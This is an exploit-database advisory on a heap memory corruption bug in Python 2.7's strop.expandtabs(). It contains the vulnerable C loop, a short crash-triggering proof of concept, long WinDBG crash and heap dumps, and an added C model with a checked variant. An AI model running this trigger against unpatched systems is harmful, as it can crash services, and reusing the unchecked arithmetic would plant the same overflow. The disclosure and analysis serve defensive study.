Python – Interpreter Heap Memory Corruption (PoC)

  • Author: Debasish Mandal
    Date: 2014-05-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33251/
  • # Title: Python Interpreter Heap Memory Corruption
    # Date: Sun, 30 Mar 2014 20:09:44 -0400
    # Vulnerability Discovered By : Unknown 
    # Proof of Concept : Debasish Mandal (https://twitter.com/debasishm89)
    # Software Link: https://www.python.org/
    # Version: All , Fix released (http://hg.python.org/cpython/rev/5dabc2d2f776)
    # Tested on: Microsoft Windows XP Professional SP2 EN (32bit)
    
    Recently a fix was pushed to the official Python source code repository (http://hg.python.org/cpython/rev/5dabc2d2f776)
    for a memory corruption vulnerability in the Python interpreter's strop module. The vulnerability lies in the expandtabs() function.
    It is due to a missing check at lines 626-627 of /Modules/stropmodule.c.
    
    Vulnerable Code:
    
    https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627
    
    ------------------------------------------------------------------------------------------------------------
    for (p = string; p < e; p++) {
        if (*p == '\t') {
            j += tabsize - (j%tabsize);
            if (old_j > j) {
                PyErr_SetString(PyExc_OverflowError,
                                "new string is too long");
                return NULL;
            }
            old_j = j;
        } else {
            j++;
            if (*p == '\n') {
                // Missing check
                i += j;
                j = 0;
            }
        }
    }
    ------------------------------------------------------------------------------------------------------------
    
    Patch Diff:
    http://hg.python.org/cpython/diff/5dabc2d2f776/Modules/stropmodule.c
    
    
    =================
    Proof of Concept:
    =================
    
    Running the code below will crash the vulnerable python.exe process.
    
    import strop
    raw_input('Press Enter to BOOM!')
    a = '\t\n' * 65536
    strop.expandtabs(a, 65536)
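
The arithmetic behind the missing check, as an added example (not code from the original advisory or from CPython): a C model of the size computation with 32-bit counters, next to a variant that refuses the input before any addition can wrap. The function names, the 64-bit reference count and the checked variant are this example's own assumptions and are not the upstream patch.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example: models the size computation of expandtabs() with the
 * 32-bit signed counters of the 32-bit build the page tested. All names
 * are illustrative; this is not the CPython source or its patch. */

/* 32-bit wraparound modelled with unsigned arithmetic (no signed-overflow UB). */
static int32_t wrap_add(int32_t a, int32_t b)
{
    return (int32_t)((uint32_t)a + (uint32_t)b);
}

/* Same structure as the loop quoted on the page: the tab branch is guarded
 * by old_j, the accumulation at '\n' is not. Returns the size the caller
 * would allocate, or -1 if tabsize is invalid or the old_j check fires. */
int32_t size_unchecked(const char *s, size_t len, int32_t tabsize)
{
    int32_t i = 0, j = 0, old_j = 0;
    if (tabsize < 1)
        return -1;
    for (size_t k = 0; k < len; k++) {
        if (s[k] == '\t') {
            j = wrap_add(j, tabsize - (j % tabsize));
            if (old_j > j)
                return -1;
            old_j = j;
        } else {
            j = wrap_add(j, 1);
            if (s[k] == '\n') {
                i = wrap_add(i, j);   /* unchecked: can wrap silently */
                j = 0;
            }
        }
    }
    return wrap_add(i, j);
}

/* Bytes the expansion really needs, computed in 64-bit arithmetic. */
int64_t size_true(const char *s, size_t len, int32_t tabsize)
{
    int64_t i = 0, j = 0;
    if (tabsize < 1)
        return -1;
    for (size_t k = 0; k < len; k++) {
        if (s[k] == '\t') {
            j += tabsize - (j % tabsize);
        } else {
            j++;
            if (s[k] == '\n') { i += j; j = 0; }
        }
    }
    return i + j;
}

/* Hardened variant: every addition is tested against INT32_MAX first.
 * Returns 0 and stores the size in *out, or -1 if it cannot be represented. */
int size_checked(const char *s, size_t len, int32_t tabsize, int32_t *out)
{
    int32_t i = 0, j = 0;
    if (tabsize < 1)
        return -1;
    for (size_t k = 0; k < len; k++) {
        if (s[k] == '\t') {
            int32_t incr = tabsize - (j % tabsize);
            if (j > INT32_MAX - incr)
                return -1;
            j += incr;
        } else {
            if (j > INT32_MAX - 1)
                return -1;
            j++;
            if (s[k] == '\n') {
                if (i > INT32_MAX - j)   /* the check the '\n' branch lacks */
                    return -1;
                i += j;
                j = 0;
            }
        }
    }
    if (i > INT32_MAX - j)
        return -1;
    *out = i + j;
    return 0;
}

/* Constructed input: n repetitions of "\t\n", the shape the PoC passes in. */
char *make_input(size_t n)
{
    char *s = malloc(2 * n);
    if (!s)
        return NULL;
    for (size_t k = 0; k < n; k++) { s[2 * k] = '\t'; s[2 * k + 1] = '\n'; }
    return s;
}

int main(void)
{
    const size_t n = 65536;
    int32_t out = 0;
    char *s = make_input(n);
    if (!s)
        return 1;
    printf("size from 32-bit unchecked pass: %ld\n", (long)size_unchecked(s, 2 * n, 65536));
    printf("size actually required:          %lld\n", (long long)size_true(s, 2 * n, 65536));
    printf("checked variant:                 %s\n",
           size_checked(s, 2 * n, 65536, &out) ? "rejected" : "accepted");
    free(s);
    return 0;
}
```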
    
    ============================
    Crash Analysis using WinDBG:
    ============================
    
    Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
    Copyright (c) Microsoft Corporation. All rights reserved.
    
    *** wait with pending attach
    Symbol search path is: SRV*E:\symbol*http://msdl.microsoft.com/download/symbols
    Executable search path is: 
    ModLoad: 1d000000 1d00a000 C:\Python27\python.exe
    ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
    ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
    ModLoad: 1e000000 1e227000 C:\WINDOWS\system32\python27.dll
    ModLoad: 77d40000 77dd0000 C:\WINDOWS\system32\USER32.dll
    ModLoad: 77f10000 77f56000 C:\WINDOWS\system32\GDI32.dll
    ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
    ModLoad: 77e70000 77f01000 C:\WINDOWS\system32\RPCRT4.dll
    ModLoad: 7c9c0000 7d1d4000 C:\WINDOWS\system32\SHELL32.dll
    ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
    ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
    ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\MSVCR90.dll
    ModLoad: 773d0000 774d2000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
    ModLoad: 5d090000 5d127000 C:\WINDOWS\system32\comctl32.dll
    (f0.320): Break instruction exception - code 80000003 (first chance)
    eax=7ffd6000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
    eip=7c901230 esp=023dffcc ebp=023dfff4 iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
    ntdll!DbgBreakPoint:
    7c901230 cc int 3
    0:001> g
    (f0.1f4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=20202020 ebx=0263bffe ecx=00003fff edx=00000001 esi=00010000 edi=025cf000
    eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
    MSVCR90!memset+0x5f:
    7855b37f f3ab rep stos dword ptr es:[edi]
    
    We can see we have a write access violation at MSVCR90!memset+0x5f:
    
    Crash stack trace:
    
    0:000> kb
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\python27.dll - 
    ChildEBP RetAddr  Args to Child
    0021fce4 1e0483e2 025ceffd 00000020 00010000 MSVCR90!memset+0x5f
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0021fd1c 1e08883b 00000000 022e7cd8 022eb5a8 python27!PyOS_AfterFork+0xc9f
    0021fd38 1e0bf781 022eb5a8 022e7cd8 00000000 python27!PyCFunction_Call+0x138
    0021fd60 1e0bcb94 1e0bd826 0021fdc4 01e280f8 python27!PyEval_GetFuncDesc+0x341
    0021fd64 1e0bd826 0021fdc4 01e280f8 02663ff0 python27!PyEval_EvalFrameEx+0x18e4
    0021fdd8 1e0be200 0021fe20 1e0be82e 02663eb8 python27!PyEval_EvalFrameEx+0x2576
    0021fde0 1e0be82e 02663eb8 00000000 0261e2c0 python27!PyEval_EvalCodeEx+0x50
    0021fe20 1e0bb295 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCodeEx+0x67e
    0021fe54 1e0e0d68 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCode+0x25
    0021fe70 1e0e0d36 0261e2c0 01de2ff3 01e1e6f0 python27!PyRun_FileExFlags+0x97
    0021fe9c 1e0e0329 785b7408 01de2ff3 00000101 python27!PyRun_FileExFlags+0x65
    0021fed8 1e0dff3e 785b7408 01de2ff3 00000001 python27!PyRun_SimpleFileExFlags+0x133
    0021fef8 1e02f5df 785b7408 01de2ff3 00000001 python27!PyRun_AnyFileExFlags+0x4c
    *** ERROR: Module load completed but symbols could not be loaded for C:\Python27\python.exe
    0021ff7c 1d001160 00000002 01de2fd0 01d9ef80 python27!Py_Main+0x805
    0021ffc0 7c816d4f 00090000 01fa0cda 7ffd6000 python+0x1160
    0021fff0 00000000 1d0012a8 00000000 78746341 kernel32!BaseProcessStart+0x23
    
    We crashed inside MSVCR90!memset.
    
    After that we restart the application and set a breakpoint at memset.
    
    0:001> bp MSVCR90!memset
    0:001> g
    Breakpoint 0 hit
    eax=00aada58 ebx=00000014 ecx=00000014 edx=00000a98 esi=1e1e0658 edi=00aada58
    eip=7855b320 esp=0021fbe8 ebp=0021fc30 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
    MSVCR90!memset:
    7855b320 8b54240c mov edx,dword ptr [esp+0Ch] ss:0023:0021fbf4=00000014
    
    Partial disassembly of the memset caller:
    
    .text:1E0483D0 sub esi, edx
    .text:1E0483D2 add [ebp+var_4], esi
    .text:1E0483D5 test esi, esi
    .text:1E0483D7 jle short loc_1E0483F8
    .text:1E0483D9 push esi ; Size
    .text:1E0483DA push 20h ; Val
    .text:1E0483DC push edi ; Dst
    .text:1E0483DD call memset
    .text:1E0483E2 add esp, 0Ch
    .text:1E0483E5 add edi, esi
    .text:1E0483E7 jmp short loc_1E0483F8
    .tex
    
    edi=00aada58 points to the destination where the final string is being copied.
    
    0:000> dd esp
    0021fbe8  1e0978ad 00aada58 00000000 00000014
    0021fbf8  00a81310 1e0977a2 1e1e0658 1e075222
    0021fc08  1e1e0658 00000000 1e0977a2 1e0977dc
    0021fc18  1e1e0658 00a81310 00000000 1e1e0658
    0021fc28  1e0977a2 00aa8e40 0021fc9c 1e0650fe
    0021fc38  1e1e0658 00a81310 00000000 009aabf0
    0021fc48  00a81310 1e06518c 1e1e0658 00a81310
    0021fc58  00000000 009aabf0 00000000 1e0651d9
    
    
    0:000> !address 00aada58
    00a80000 : 00a80000 - 0004b000
    Type 00020000 MEM_PRIVATE
    Protect 00000004 PAGE_READWRITE
    State 00001000 MEM_COMMIT
    Usage RegionUsageHeap
    Handle 00970000
    
    
    This confirms that memset() is writing to the heap. After a few calls to memset, the python.exe process will crash.
    
    0:000> g
    (7d8.44c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=20202020 ebx=00adbf66 ecx=000037e1 edx=00000001 esi=00010000 edi=00b0e000
    eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
    MSVCR90!memset+0x5f:
    7855b37f f3ab rep stos dword ptr es:[edi]
    
    =========================================
    Verify memory corruption using bang heap:
    =========================================
    
    0:000> !heap -s
    Heap     Flags    Reserv Commit   Virt   Free   List    UCR   Virt   Lock  Fast
                        (k)    (k)    (k)    (k)  length        blocks  cont.  heap
    -----------------------------------------------------------------------------
    00240000 00000002   1024     32     32      8      1      1      0      0   L
    00340000 00001002     64     24     24     13      1      1      0      0   L
    00350000 00008000     64     12     12     10      1      1      0      0
    00930000 00001002     64     16     16      2      1      1      0      0   L
    00950000 00001002     64     16     16      2      2      1      0      0   L
    00970000 00001002   3136   1644   1656     33      3      2      0      0   L
    -----------------------------------------------------------------------------
    
    0x00240000 is the default process heap. From the size of committed bytes we can say that 0x00970000 is handling a large amount of data.
    
    0:000> !heap -a 00970000
    Index Address Name Debugging options enabled
    6: 00970000 
    Segment at 00970000 to 00980000 (00010000 bytes committed)
    Segment at 00980000 to 00a80000 (00100000 bytes committed)
    Segment at 00a80000 to 00c80000 (0008b000 bytes committed)
    Flags: 00001002
    ForceFlags: 00000000
    Granularity: 8 bytes
    Segment Reserve: 00400000
    Segment Commit: 00002000
    DeCommit Block Thres: 00000200
    DeCommit Total Thres: 00002000
    Total Free Size: 000010df
    Max. Allocation Size: 7ffdefff
    Lock Variable at: 00970608
    Next TagIndex: 0000
    Maximum TagIndex: 0000
    Tag Entries: 00000000
    PsuedoTag Entries: 00000000
    Virtual Alloc List: 00970050
    UCR FreeList: 00970598
    FreeList Usage: 84091158 00001001 00000000 80000000
    FreeList[ 00 ] at 00970178: 00ac5eb8 . 00a6f8d8
    00a6f8d0: 01008 . 00ad8 [00] - free
    00b0bf88: 10100 . 10100 [20] - free
    Unable to read nt!_HEAP_FREE_ENTRY structure at 20202018
    FreeList[ 03 ] at 00970190: 00a38ff0 . 00a57fe0
    00a57fd8: 00048 . 00018 [00] - free
    00a38fe8: 00048 . 00018 [00] - free
    FreeList[ 04 ] at 00970198: 009c1fe8 . 009c1fe8
    009c1fe0: 00188 . 00020 [00] - free
    FreeList[ 06 ] at 009701a8: 00acf128 . 00acf128
    00acf120: 00130 . 00030 [00] - free
    FreeList[ 08 ] at 009701b8: 00a58fb8 . 00a58fb8
    00a58fb0: 00010 . 00040 [00] - free
    FreeList[ 0c ] at 009701d8: 009cb980 . 009cb980
    009cb978: 00010 . 00060 [00] - free
    FreeList[ 10 ] at 009701f8: 009c7588 . 009c7588
    009c7580: 00178 . 00080 [00] - free
    FreeList[ 13 ] at 00970210: 00a2af50 . 00a2af50
    00a2af48: 000c8 . 00098 [00] - free
    FreeList[ 1a ] at 00970248: 00ac5a68 . 00ac5a68
    00ac5a60: 00170 . 000d0 [00] - free
    FreeList[ 1f ] at 00970270: 00a71990 . 00a71990
    00a71988: 00188 . 000f8 [00] - free
    FreeList[ 20 ] at 00970278: 00a78c78 . 00a78c78
    00a78c70: 00188 . 00100 [00] - free
    FreeList[ 2c ] at 009702d8: 009d8788 . 009d8788
    009d8780: 001d0 . 00160 [00] - free
    FreeList[ 7f ] at 00970570: 00a7a3c0 . 00a7a3c0
    00a7a3b8: 00220 . 003f8 [00] - free
    Segment00 at 00970640:
    Flags: 00000000
    Base: 00970000
    First Entry: 00970680
    Last Entry: 00980000
    Total Pages: 00000010
    Total UnCommit: 00000000
    Largest UnCommit: 00000000
    UnCommitted Ranges: (0)
    
    Segment01 at 00980000:
    Flags: 00000000
    Base: 00980000
    First Entry: 00980040
    Last Entry: 00a80000
    Total Pages: 00000100
    Total UnCommit: 00000000
    Largest UnCommit: 00000000
    UnCommitted Ranges: (0)
    
    00a344d0: 00188 . 00188 [01] - busy (180)
    00a34658: 00188 . 00170 [01] - busy (164)
    00a347c8: 00170 . 00170 [01] - busy (168)
    00a34938: 00170 . 00168 [01] - busy (15c)
    00a34aa0: 00168 . 00170 [01] - busy (168)
    00a34c10: 00170 . 00160 [01] - busy (158)
    00a34d70: 00160 . 00260 [01] - busy (251)
    00a34fd0: 00260 . 00b60 [01] - busy (b53)
    00a35b30: 00b60 . 003b8 [01] - busy (3ad)
    00a35ee8: 003b8 . 000c8 [01] - busy (c0)
    00a35fb0: 000c8 . 00198 [01] - busy (190)
    00a36148: 00198 . 001f8 [01] - busy (1ec)
    00a36340: 001f8 . 00168 [01] - busy (160)
    00a364a8: 00168 . 00170 [01] - busy (168)
    00a36618: 00170 . 001d0 [01] - busy (1c4)
    00a367e8: 001d0 . 00198 [01] - busy (190)
    00a36980: 00198 . 001b8 [01] - busy (1b0)
    00a36b38: 001b8 . 00168 [01] - busy (15c)
    00a36ca0: 00168 . 00178 [01] - busy (16c)
    00a36e18: 00178 . 00170 [01] - busy (164)
    00a36f88: 00170 . 00180 [01] - busy (174)
    00a37108: 00180 . 00178 [01] - busy (170)
    00a37280: 00178 . 00180 [01] - busy (178)
    00a37400: 00180 . 00178 [01] - busy (16c)
    00a37578: 00178 . 00170 [01] - busy (164)
    00a376e8: 00170 . 00168 [01] - busy (15c)
    00a37850: 00168 . 00188 [01] - busy (17c)
    00a379d8: 00188 . 00170 [01] - busy (164)
    00a37b48: 00170 . 00190 [01] - busy (184)
    00a37cd8: 00190 . 00160 [01] - busy (158)
    00a37e38: 00160 . 003a0 [01] - busy (398)
    00a381d8: 003a0 . 002b0 [01] - busy (2a4)
    00a38488: 002b0 . 002a8 [01] - busy (29c)
    00a38730: 002a8 . 002a8 [01] - busy (29c)
    00a389d8: 002a8 . 00248 [01] - busy (23c)
    00a38c20: 00248 . 00248 [01] - busy (23c)
    00a38e68: 00248 . 00138 [01] - busy (12c)
    00a38fa0: 00138 . 00048 [01] - busy (3a)
    00a38fe8: 00048 . 00018 [00]
    00a39000: 00018 . 00178 [01] - busy (16f)
    00a39178: 00178 . 00188 [01] - busy (180)
    00a39300: 00188 . 00110 [01] - busy (108)
    00a39410: 00110 . 00188 [01] - busy (180)
    00a39598: 00188 . 00138 [01] - busy (12d)
    00a396d0: 00138 . 00180 [01] - busy (174)
    00a39850: 00180 . 00010 [01] - busy (4)
    00a39860: 00010 . 00010 [01] - busy (4)
    00a39870: 00010 . 00168 [01] - busy (15c)
    00a399d8: 00168 . 18008 [01] - busy (18000)
    00a519e0: 18008 . 002c0 [01] - busy (2b4)
    00a51ca0: 002c0 . 00368 [01] - busy (35d)
    00a52008: 00368 . 00198 [01] - busy (18e)
    00a521a0: 00198 . 00330 [01] - busy (324)
    00a524d0: 00330 . 00488 [01] - busy (47c)
    00a52958: 00488 . 003c8 [01] - busy (3c0)
    00a52d20: 003c8 . 00608 [01] - busy (600)
    00a53328: 00608 . 001d8 [01] - busy (1c9)
    00a53500: 001d8 . 00188 [01] - busy (180)
    00a53688: 00188 . 001e0 [01] - busy (1d8)
    00a53868: 001e0 . 00108 [01] - busy (100)
    00a53970: 00108 . 00108 [01] - busy (100)
    00a53a78: 00108 . 00108 [01] - busy (100)
    00a53b80: 00108 . 00160 [01] - busy (158)
    00a53ce0: 00160 . 00190 [01] - busy (180)
    00a53e70: 00190 . 00178 [01] - busy (16c)
    00a53fe8: 00178 . 00188 [01] - busy (180)
    00a54170: 00188 . 00180 [01] - busy (174)
    00a542f0: 00180 . 00028 [01] - busy (20)
    00a54318: 00028 . 00018 [01] - busy (10)
    00a54330: 00018 . 01300 [01] - busy (12f7)
    00a55630: 01300 . 00818 [01] - busy (809)
    00a55e48: 00818 . 001b0 [01] - busy (1a8)
    00a55ff8: 001b0 . 00288 [01] - busy (27b)
    00a56280: 00288 . 00488 [01] - busy (47e)
    00a56708: 00488 . 00188 [01] - busy (180)
    00a56890: 00188 . 00188 [01] - busy (180)
    00a56a18: 00188 . 00188 [01] - busy (180)
    00a56ba0: 00188 . 00188 [01] - busy (180)
    00a56d28: 00188 . 00188 [01] - busy (17c)
    00a56eb0: 00188 . 00128 [01] - busy (120)
    00a56fd8: 00128 . 00010 [01] - busy (8)
    00a56fe8: 00010 . 001b8 [01] - busy (1b0)
    00a571a0: 001b8 . 00188 [01] - busy (180)
    00a57328: 00188 . 00188 [01] - busy (180)
    00a574b0: 00188 . 00608 [01] - busy (600)
    00a57ab8: 00608 . 00170 [01] - busy (161)
    00a57c28: 00170 . 001e0 [01] - busy (1d8)
    00a57e08: 001e0 . 00188 [01] - busy (180)
    00a57f90: 00188 . 00048 [01] - busy (40)
    00a57fd8: 00048 . 00018 [00]
    00a57ff0: 00018 . 003e8 [01] - busy (3dc)
    00a583d8: 003e8 . 00188 [01] - busy (17c)
    00a58560: 00188 . 00450 [01] - busy (441)
    00a589b0: 00450 . 000c8 [01] - busy (c0)
    00a58a78: 000c8 . 00010 [01] - busy (8)
    00a58a88: 00010 . 00010 [01] - busy (4)
    00a58a98: 00010 . 003e8 [01] - busy (3dc)
    00a58e80: 003e8 . 00120 [01] - busy (114)
    00a58fa0: 00120 . 00010 [01] - busy (8)
    00a58fb0: 00010 . 00040 [00]
    00a58ff0: 00040 . 00170 [01] - busy (164)
    00a59160: 00170 . 00288 [01] - busy (280)
    00a593e8: 00288 . 00188 [01] - busy (180)
    00a59570: 00188 . 00168 [01] - busy (15c)
    00a596d8: 00168 . 00170 [01] - busy (164)
    00a59848: 00170 . 001e0 [01] - busy (1d8)
    00a59a28: 001e0 . 00050 [01] - busy (40)
    00a59a78: 00050 . 00190 [01] - busy (188)
    00a59c08: 00190 . 00190 [01] - busy (185)
    00a59d98: 00190 . 00178 [01] - busy (16c)
    00a59f10: 00178 . 00170 [01] - busy (168)
    00a5a080: 00170 . 00160 [01] - busy (154)
    00a5a1e0: 00160 . 00178 [01] - busy (170)
    00a5a358: 00178 . 003e8 [01] - busy (3dc)
    00a5a740: 003e8 . 001d0 [01] - busy (1c7)
    00a5a910: 001d0 . 00160 [01] - busy (157)
    00a5aa70: 00160 . 001b0 [01] - busy (1a8)
    00a5ac20: 001b0 . 00188 [01] - busy (17e)
    00a5ada8: 00188 . 00210 [01] - busy (202)
    00a5afb8: 00210 . 00050 [01] - busy (40)
    00a5b008: 00050 . 00240 [01] - busy (238)
    00a5b248: 00240 . 002a8 [01] - busy (29c)
    00a5b4f0: 002a8 . 00248 [01] - busy (23c)
    00a5b738: 00248 . 00278 [01] - busy (270)
    00a5b9b0: 00278 . 002a8 [01] - busy (29c)
    00a5bc58: 002a8 . 00278 [01] - busy (270)
    00a5bed0: 00278 . 00248 [01] - busy (23c)
    00a5c118: 00248 . 00278 [01] - busy (270)
    00a5c390: 00278 . 00278 [01] - busy (270)
    00a5c608: 00278 . 00248 [01] - busy (23c)
    00a5c850: 00248 . 00248 [01] - busy (23c)
    00a5ca98: 00248 . 00248 [01] - busy (23c)
    00a5cce0: 00248 . 00248 [01] - busy (23c)
    00a5cf28: 00248 . 00248 [01] - busy (23c)
    00a5d170: 00248 . 00248 [01] - busy (23c)
    00a5d3b8: 00248 . 001a0 [01] - busy (194)
    00a5d558: 001a0 . 00248 [01] - busy (23c)
    00a5d7a0: 00248 . 00248 [01] - busy (23c)
    00a5d9e8: 00248 . 00248 [01] - busy (23c)
    00a5dc30: 00248 . 00248 [01] - busy (23c)
    00a5de78: 00248 . 00248 [01] - busy (23c)
    00a5e0c0: 00248 . 00248 [01] - busy (23c)
    00a5e308: 00248 . 00248 [01] - busy (23c)
    00a5e550: 00248 . 00248 [01] - busy (23c)
    00a5e798: 00248 . 00248 [01] - busy (23c)
    00a5e9e0: 00248 . 00248 [01] - busy (23c)
    00a5ec28: 00248 . 002a8 [01] - busy (29c)
    00a5eed0: 002a8 . 002a8 [01] - busy (29c)
    00a5f178: 002a8 . 00248 [01] - busy (23c)
    00a5f3c0: 00248 . 002a8 [01] - busy (29c)
    00a5f668: 002a8 . 002a8 [01] - busy (29c)
    00a5f910: 002a8 . 00248 [01] - busy (23c)
    00a5fb58: 00248 . 00248 [01] - busy (23c)
    00a5fda0: 00248 . 002a8 [01] - busy (29c)
    00a60048: 002a8 . 002a8 [01] - busy (29c)
    00a602f0: 002a8 . 002a8 [01] - busy (29c)
    00a60598: 002a8 . 002a8 [01] - busy (29c)
    00a60840: 002a8 . 002a8 [01] - busy (29c)
    00a60ae8: 002a8 . 002a8 [01] - busy (29c)
    00a60d90: 002a8 . 00248 [01] - busy (23c)
    00a60fd8: 00248 . 002a8 [01] - busy (29c)
    00a61280: 002a8 . 00248 [01] - busy (23c)
    00a614c8: 00248 . 00248 [01] - busy (23c)
    00a61710: 00248 . 00248 [01] - busy (23c)
    00a61958: 00248 . 00248 [01] - busy (23c)
    00a61ba0: 00248 . 002a8 [01] - busy (29c)
    00a61e48: 002a8 . 00280 [01] - busy (278)
    00a620c8: 00280 . 00280 [01] - busy (278)
    00a62348: 00280 . 00248 [01] - busy (23c)
    00a62590: 00248 . 00248 [01] - busy (23c)
    00a627d8: 00248 . 00248 [01] - busy (23c)
    00a62a20: 00248 . 00248 [01] - busy (23c)
    00a62c68: 00248 . 00248 [01] - busy (23c)
    00a62eb0: 00248 . 00248 [01] - busy (23c)
    00a630f8: 00248 . 00248 [01] - busy (23c)
    00a63340: 00248 . 00248 [01] - busy (23c)
    00a63588: 00248 . 00248 [01] - busy (23c)
    00a637d0: 00248 . 00248 [01] - busy (23c)
    00a63a18: 00248 . 00248 [01] - busy (23c)
    00a63c60: 00248 . 00248 [01] - busy (23c)
    00a63ea8: 00248 . 00248 [01] - busy (23c)
    00a640f0: 00248 . 00248 [01] - busy (23c)
    00a64338: 00248 . 00248 [01] - busy (23c)
    00a64580: 00248 . 00248 [01] - busy (23c)
    00a647c8: 00248 . 00248 [01] - busy (23c)
    00a64a10: 00248 . 00248 [01] - busy (23c)
    00a64c58: 00248 . 00248 [01] - busy (23c)
    00a64ea0: 00248 . 001c8 [01] - busy (1bc)
    00a65068: 001c8 . 00248 [01] - busy (23c)
    00a652b0: 00248 . 00248 [01] - busy (23c)
    00a654f8: 00248 . 00248 [01] - busy (23c)
    00a65740: 00248 . 00220 [01] - busy (218)
    00a65960: 00220 . 00248 [01] - busy (23c)
    00a65ba8: 00248 . 00248 [01] - busy (23c)
    00a65df0: 00248 . 00278 [01] - busy (270)
    00a66068: 00278 . 00248 [01] - busy (23c)
    00a662b0: 00248 . 00248 [01] - busy (23c)
    00a664f8: 00248 . 00248 [01] - busy (23c)
    00a66740: 00248 . 00248 [01] - busy (23c)
    00a66988: 00248 . 00118 [01] - busy (110)
    00a66aa0: 00118 . 00248 [01] - busy (23c)
    00a66ce8: 00248 . 00248 [01] - busy (23c)
    00a66f30: 00248 . 00118 [01] - busy (110)
    00a67048: 00118 . 00248 [01] - busy (23c)
    00a67290: 00248 . 00248 [01] - busy (23c)
    00a674d8: 00248 . 00220 [01] - busy (218)
    00a676f8: 00220 . 00248 [01] - busy (23c)
    00a67940: 00248 . 00248 [01] - busy (23c)
    00a67b88: 00248 . 00248 [01] - busy (23c)
    00a67dd0: 00248 . 00248 [01] - busy (23c)
    00a68018: 00248 . 00248 [01] - busy (23c)
    00a68260: 00248 . 00248 [01] - busy (23c)
    00a684a8: 00248 . 00248 [01] - busy (23c)
    00a686f0: 00248 . 00248 [01] - busy (23c)
    00a68938: 00248 . 00248 [01] - busy (23c)
    00a68b80: 00248 . 00248 [01] - busy (23c)
    00a68dc8: 00248 . 00248 [01] - busy (23c)
    00a69010: 00248 . 00248 [01] - busy (23c)
    00a69258: 00248 . 00130 [01] - busy (128)
    00a69388: 00130 . 00248 [01] - busy (23c)
    00a695d0: 00248 . 00248 [01] - busy (23c)
    00a69818: 00248 . 00118 [01] - busy (110)
    00a69930: 00118 . 00248 [01] - busy (23c)
    00a69b78: 00248 . 00248 [01] - busy (23c)
    00a69dc0: 00248 . 00248 [01] - busy (23c)
    00a6a008: 00248 . 002a8 [01] - busy (29c)
    00a6a2b0: 002a8 . 00248 [01] - busy (23c)
    00a6a4f8: 00248 . 00248 [01] - busy (23c)
    00a6a740: 00248 . 00248 [01] - busy (23c)
    00a6a988: 00248 . 00248 [01] - busy (23c)
    00a6abd0: 00248 . 00248 [01] - busy (23c)
    00a6ae18: 00248 . 00248 [01] - busy (23c)
    00a6b060: 00248 . 00120 [01] - busy (118)
    00a6b180: 00120 . 00248 [01] - busy (23c)
    00a6b3c8: 00248 . 00248 [01] - busy (23c)
    00a6b610: 00248 . 00248 [01] - busy (23c)
    00a6b858: 00248 . 00248 [01] - busy (23c)
    00a6baa0: 00248 . 00248 [01] - busy (23c)
    00a6bce8: 00248 . 00248 [01] - busy (23c)
    00a6bf30: 00248 . 00248 [01] - busy (23c)
    00a6c178: 00248 . 00248 [01] - busy (23c)
    00a6c3c0: 00248 . 00248 [01] - busy (23c)
    00a6c608: 00248 . 00148 [01] - busy (140)
    00a6c750: 00148 . 00160 [01] - busy (158)
    00a6c8b0: 00160 . 02018 [01] - busy (2010)
    00a6e8c8: 02018 . 01008 [01] - busy (1000)
    00a6f8d0: 01008 . 00ad8 [00]
    00a703a8: 00ad8 . 00120 [01] - busy (115)
    00a704c8: 00120 . 00358 [01] - busy (34d)
    00a70820: 00358 . 00188 [01] - busy (180)
    00a709a8: 00188 . 00110 [01] - busy (104)
    00a70ab8: 00110 . 00050 [01] - busy (40)
    00a70b08: 00050 . 00358 [01] - busy (34c)
    00a70e60: 00358 . 00168 [01] - busy (160)
    00a70fc8: 00168 . 00118 [01] - busy (109)
    00a710e0: 00118 . 001c8 [01] - busy (1c0)
    00a712a8: 001c8 . 00168 [01] - busy (160)
    00a71410: 00168 . 00210 [01] - busy (202)
    00a71620: 00210 . 001e0 [01] - busy (1d8)
    00a71800: 001e0 . 00188 [01] - busy (180)
    00a71988: 00188 . 000f8 [00]
    00a71a80: 000f8 . 01808 [01] - busy (1800)
    00a73288: 01808 . 01808 [01] - busy (1800)
    00a74a90: 01808 . 01808 [01] - busy (1800)
    00a76298: 01808 . 00188 [01] - busy (180)
    00a76420: 00188 . 00188 [01] - busy (180)
    00a765a8: 00188 . 001e0 [01] - busy (1d8)
    00a76788: 001e0 . 00308 [01] - busy (300)
    00a76a90: 00308 . 00608 [01] - busy (600)
    00a77098: 00608 . 00180 [01] - busy (178)
    00a77218: 00180 . 00168 [01] - busy (160)
    00a77380: 00168 . 00180 [01] - busy (178)
    00a77500: 00180 . 00168 [01] - busy (15c)
